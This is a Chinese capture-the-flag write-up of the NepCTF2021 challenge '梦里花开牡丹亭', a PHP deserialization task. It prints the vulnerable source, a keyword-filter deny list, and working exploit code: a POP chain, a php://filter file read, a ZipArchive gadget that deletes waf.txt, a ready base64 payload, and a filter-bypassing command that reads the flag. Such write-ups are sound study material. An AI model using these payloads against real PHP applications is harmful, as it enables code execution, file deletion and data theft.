NepCTF2021 梦里花开牡丹亭
2021/4/10 18:43:53
本文主要是介绍NepCTF2021 梦里花开牡丹亭,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
NepCTF2021 梦里花开牡丹亭
知识点:
1.数组绕过
2.pop链
3.ZipArchive 内置类的open方法达到删除文件效果
解题:
源码:
<?php highlight_file(__FILE__); error_reporting(0); include('shell.php'); class Game{ public $username; public $password; public $choice; public $register; public $file; public $filename; public $content; public function __construct() { $this->username='user'; $this->password='user'; } public function __wakeup(){ if(md5($this->register)==="21232f297a57a5a743894a0e4a801fc3"){ $this->choice=new login($this->file,$this->filename,$this->content); }else{ $this->choice = new register(); } } public function __destruct() { $this->choice->checking($this->username,$this->password); } } class login{ public $file; public $filename; public $content; public function __construct($file,$filename,$content) { $this->file=$file; $this->filename=$filename; $this->content=$content; } public function checking($username,$password) { if($username==='admin'&&$password==='admin'){ $this->file->open($this->filename,$this->content); die('login success you can to open shell file!'); } } } class register{ public function checking($username,$password) { if($username==='admin'&&$password==='admin'){ die('success register admin'); }else{ die('please register admin '); } } } class Open{ function open($filename, $content){ if(!file_get_contents('waf.txt')){ shell($content); }else{ echo file_get_contents($filename.".php"); } } } if($_GET['a']!==$_GET['b']&&(md5($_GET['a']) === md5($_GET['b'])) && (sha1($_GET['a'])=== sha1($_GET['b']))){ @unserialize(base64_decode($_POST['unser'])); }
if(md5($this->register)===“21232f297a57a5a743894a0e4a801fc3”)
解密得到要等于admin。
先查看shell.php
:
<?php class Game{ public $username; public $password; public $choice; public $register="admin"; public $file; public $filename='php://filter/read=convert.base64-encode/resource=shell'; public $content; public function __construct() { $this->username='admin'; $this->password='admin'; } public function __wakeup(){ if(md5($this->register)==="21232f297a57a5a743894a0e4a801fc3"){ $this->choice=new login($this->file,$this->filename,$this->content); }else{ $this->choice = new register(); } } public function __destruct() { $this->choice->checking($this->username,$this->password); } } class login{ public $file; public $filename; public $content; public function __construct($file,$filename,$content) { $this->file=$file; $this->filename=$filename; $this->content=$content; } public function checking($username,$password) { if($username==='admin'&&$password==='admin'){ $this->file->open($this->filename,$this->content); die('login success you can to open shell file!'); } } } class register{ public function checking($username,$password) { if($username==='admin'&&$password==='admin'){ die('success register admin'); }else{ die('please register admin '); } } } class Open{ function open($filename, $content){ if(!file_get_contents('waf.txt')){ shell($content); }else{ echo file_get_contents($filename.".php"); } } } $a=new Game(); $a->file=new Open(); echo base64_encode(serialize($a)); ?>
得到shell.php
:
<?php function shell($cmd){ if(strlen($cmd)<10){ if(preg_match('/cat|tac|more|less|head|tail|nl|tail|sort|od|base|awk|cut|grep|uniq|string|sed|rev|zip|\*|\?/',$cmd)){ die("NO"); }else{ return system($cmd); } }else{ die('so long!'); } }login success you can to open shell file!
联合index.php里面的Open类:
PHP class Open{ function open($filename, $content){ if(!file_get_contents('waf.txt')){ // 当waf.txt没读取成功时才能得到flag shell($content); }else{ echo file_get_contents($filename.".php"); // filename=php://filter/read=convert.base64-encode/resource=shell } } }
可知我们只要使 file_get_contents('waf.txt')
读取失败就可以进入 shell($content)
来执行系统命令。所以我们应该要想办法将waf.txt这个文件删除,这样就会读取失败,才能执行我们的命令。
所以我们利用ZipArchive
原生类调用open方法,即可将即可将$filename(waf.txt)
删除:
<?php class Game{ public $username = "admin"; public $password = "admin"; public $choice; public $register = "admin"; public $file = new ZipArchive(); public $filename = "waf.txt"; public $content = ZipArchive::OVERWRITE; public function __construct() { $this->username='user'; $this->password='user'; } public function __wakeup(){ if(md5($this->register)==="21232f297a57a5a743894a0e4a801fc3"){ // admin $this->choice=new login($this->file,$this->filename,$this->content); }else{ $this->choice = new register(); } } public function __destruct() { $this->choice->checking($this->username,$this->password); } } class login{ public $file; public $filename; public $content; } class Open{ function open($filename, $content){ } } $poc = new Game(); echo base64_encode(serialize($poc));
生成payload:
Tzo0OiJHYW1lIjo3OntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjU6ImFkbWluIjtzOjY6ImNob2ljZSI7TjtzOjg6InJlZ2lzdGVyIjtzOjU6ImFkbWluIjtzOjQ6ImZpbGUiO086MTA6IlppcEFyY2hpdmUiOjU6e3M6Njoic3RhdHVzIjtpOjA7czo5OiJzdGF0dXNTeXMiO2k6MDtzOjg6Im51bUZpbGVzIjtpOjA7czo4OiJmaWxlbmFtZSI7czowOiIiO3M6NzoiY29tbWVudCI7czowOiIiO31zOjg6ImZpbGVuYW1lIjtzOjc6IndhZi50eHQiO3M6NzoiY29udGVudCI7aTo4O30=
删除了waf.txt
。接下来就可以使用 n\l /fla*
执行命令读取flag了:
<?php class Game{ public $username; public $password; public $choice; public $register="admin"; public $file; public $filename='...'; public $content = "n\l /flag"; public function __construct() { $this->username='admin'; $this->password='admin'; } public function __wakeup(){ if(md5($this->register)==="21232f297a57a5a743894a0e4a801fc3"){ $this->choice=new login($this->file,$this->filename,$this->content); }else{ $this->choice = new register(); } } public function __destruct() { $this->choice->checking($this->username,$this->password); } } class login{ public $file; public $filename; public $content; public function __construct($file,$filename,$content) { $this->file=$file; $this->filename=$filename; $this->content=$content; } public function checking($username,$password) { if($username==='admin'&&$password==='admin'){ $this->file->open($this->filename,$this->content); die('login success you can to open shell file!'); } } } class register{ public function checking($username,$password) { if($username==='admin'&&$password==='admin'){ die('success register admin'); }else{ die('please register admin '); } } } class Open{ function open($filename, $content){ if(!file_get_contents('waf.txt')){ shell($content); }else{ echo file_get_contents($filename.".php"); } } } $a=new Game(); $a->file=new Open(); echo base64_encode(serialize($a)); ?>
这篇关于NepCTF2021 梦里花开牡丹亭的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-15在使用平台私钥进行解密时提示 "私钥解密失败" 错误信息是什么原因?-icode9专业技术文章分享
- 2024-11-15Layui框架有哪些方式引入?-icode9专业技术文章分享
- 2024-11-15Layui框架中有哪些减少对全局环境的污染方法?-icode9专业技术文章分享
- 2024-11-15laydate怎么关闭自动的日期格式校验功能?-icode9专业技术文章分享
- 2024-11-15laydate怎么取消初始日期校验?-icode9专业技术文章分享
- 2024-11-15SendGrid 的邮件发送时,怎么设置回复邮箱?-icode9专业技术文章分享
- 2024-11-15使用 SendGrid API 发送邮件后获取到唯一的请求 ID?-icode9专业技术文章分享
- 2024-11-15mailgun 发送邮件 tags标签最多有多少个?-icode9专业技术文章分享
- 2024-11-15mailgun 发送邮件 怎么批量发送给多个人?-icode9专业技术文章分享
- 2024-11-15如何搭建web开发环境并实现 web项目在浏览器中访问?-icode9专业技术文章分享